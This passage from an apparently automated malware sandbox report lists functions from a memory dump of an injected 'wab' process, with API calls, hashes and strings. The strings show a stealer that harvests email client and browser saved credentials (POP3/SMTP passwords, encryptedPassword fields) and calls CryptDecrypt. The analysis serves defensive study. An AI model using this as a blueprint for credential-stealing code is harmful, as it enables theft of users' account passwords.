                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                      Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                      Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                      Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID:
                      • API String ID: 145871493-0
                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                      Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfile$StringWrite_itoamemset
                      • String ID:
                      • API String ID: 4165544737-0
                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                      Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                      Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                      Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                      Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: EnumNamesResource
                      • String ID:
                      • API String ID: 3334572018-0
                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                      Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                      Download Yara Rule
                      APIs
                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                      Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                      Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                      Non-executed Functions

                      Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                      • API String ID: 2238633743-192783356
                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                      Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString_mbscmpstrlen
                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                      • API String ID: 3963849919-1658304561
                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                      Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@memcpymemset
                      • String ID: (yE$(yE$(yE
                      • API String ID: 1865533344-362086290
                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                      Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040EBD8
                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                      • memset.MSVCRT ref: 0040EC2B
                      • memset.MSVCRT ref: 0040EC47
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                      • memset.MSVCRT ref: 0040ECDD
                      • memset.MSVCRT ref: 0040ECF2
                      • _mbscpy.MSVCRT ref: 0040ED59
                      • _mbscpy.MSVCRT ref: 0040ED6F
                      • _mbscpy.MSVCRT ref: 0040ED85
                      • _mbscpy.MSVCRT ref: 0040ED9B
                      • _mbscpy.MSVCRT ref: 0040EDB1
                      • _mbscpy.MSVCRT ref: 0040EDC7
                      • memset.MSVCRT ref: 0040EDE1
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                      • API String ID: 3137614212-1455797042
                      • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                      • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                      Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                      • memset.MSVCRT ref: 0040E5B8
                      • memset.MSVCRT ref: 0040E5CD
                      • _mbscpy.MSVCRT ref: 0040E634
                      • _mbscpy.MSVCRT ref: 0040E64A
                      • _mbscpy.MSVCRT ref: 0040E660
                      • _mbscpy.MSVCRT ref: 0040E676
                      • _mbscpy.MSVCRT ref: 0040E68C
                      • _mbscpy.MSVCRT ref: 0040E69F
                      • memset.MSVCRT ref: 0040E6B5
                      • memset.MSVCRT ref: 0040E6CC
                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                        • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                      • memset.MSVCRT ref: 0040E736
                      • memset.MSVCRT ref: 0040E74F
                      • sprintf.MSVCRT ref: 0040E76D
                      • sprintf.MSVCRT ref: 0040E788
                      • _strcmpi.MSVCRT ref: 0040E79E
                      • _strcmpi.MSVCRT ref: 0040E7B7
                      • _strcmpi.MSVCRT ref: 0040E7D3
                      • memset.MSVCRT ref: 0040E858
                      • sprintf.MSVCRT ref: 0040E873
                      • _strcmpi.MSVCRT ref: 0040E889
                      • _strcmpi.MSVCRT ref: 0040E8A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                      • API String ID: 4171719235-3943159138
                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                      Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                      • GetWindowRect.USER32(?,?), ref: 00410487
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                      • GetDC.USER32 ref: 004104E2
                      • strlen.MSVCRT ref: 00410522
                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                      • ReleaseDC.USER32(?,?), ref: 00410580
                      • sprintf.MSVCRT ref: 00410640
                      • SetWindowTextA.USER32(?,?), ref: 00410654
                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                      • GetClientRect.USER32(?,?), ref: 004106DD
                      • GetWindowRect.USER32(?,?), ref: 004106E7
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                      • GetClientRect.USER32(?,?), ref: 00410737
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                      • String ID: %s:$EDIT$STATIC
                      • API String ID: 1703216249-3046471546
                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                      Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004024F5
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • _mbscpy.MSVCRT ref: 00402533
                      • _mbscpy.MSVCRT ref: 004025FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$QueryValuememset
                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                      • API String ID: 168965057-606283353
                      • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                      • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                      Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 00402869
                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                      • _mbscpy.MSVCRT ref: 004028A3
                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                      • _mbscpy.MSVCRT ref: 0040297B
                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                      • API String ID: 1497257669-167382505
                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                      Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                      • LoadCursorA.USER32(00000067), ref: 0040115F
                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                      • EndDialog.USER32(?,00000001), ref: 0040121A
                      • DeleteObject.GDI32(?), ref: 00401226
                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                      • ShowWindow.USER32(00000000), ref: 00401253
                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                      • ShowWindow.USER32(00000000), ref: 00401262
                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                      • memset.MSVCRT ref: 0040128E
                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                      • String ID:
                      • API String ID: 2998058495-0
                      • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                      • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
